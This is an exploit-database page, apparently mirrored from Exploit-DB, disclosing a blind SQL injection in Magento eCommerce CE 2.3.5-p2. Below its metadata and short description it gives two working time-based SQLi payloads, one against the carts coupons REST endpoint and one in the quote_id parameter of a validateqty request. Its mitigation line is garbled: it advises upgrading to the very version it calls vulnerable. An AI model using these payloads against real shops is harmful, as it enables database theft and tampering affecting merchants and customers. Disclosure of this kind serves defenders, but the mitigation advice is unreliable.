header-logo
Suggest Exploit
vendor:
Magento eCommerce CE
by:
Aydin Naserifard
8.8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Magento eCommerce CE
Affected Version From: 2.3.5-p2
Affected Version To: 2.3.5-p2
Patch Exists: YES
Related CWE:
CPE: cpe:a:magento:magento_ecommerce_ce:2.3.5-p2
Metasploit:
Other Scripts:
Platforms Tested:
2021

Magento eCommerce CE v2.3.5-p2 – Blind SQLi

Magento eCommerce CE v2.3.5-p2 is vulnerable to Blind SQL Injection. An attacker can inject malicious SQL queries via the quote_id parameter in the POST /cargo/index/validateqty request and the PUT /rest/default/V1/carts/mine/coupons/aydin request. This can allow an attacker to extract data from the database, modify data, execute administration operations, and potentially compromise the system.

Mitigation:

Upgrade to the latest version of Magento eCommerce CE v2.3.5-p2.
Source

Exploit-DB raw data:

Exploit Title: Magento eCommerce CE v2.3.5-p2 - Blind SQLi
# Date: 2021-4-21
# Exploit Author: Aydin Naserifard
# Vendor Homepage: https://www.adobe.com/
# Software Link:  https://github.com/magento/magento2/releases/tag/2.3.5-p2
# Version: [2.3.5-p2]
# Tested on: [2.3.5-p2]

POC:

1)PUT
/rest/default/V1/carts/mine/coupons/aydin'+%2f+if(ascii(substring(database(),3,1))=100,sleep(5),0)%23

2)POST /cargo/index/validateqty
[quote_id parameter]
quote_id=100499%2fif(substring(database(),1,1))="97",sleep(5),1000)+and+`parent_item_id`+IS+NULL+GROUP+BY+`sku`%23

Navigation

Suggest Exploit

Services By CQR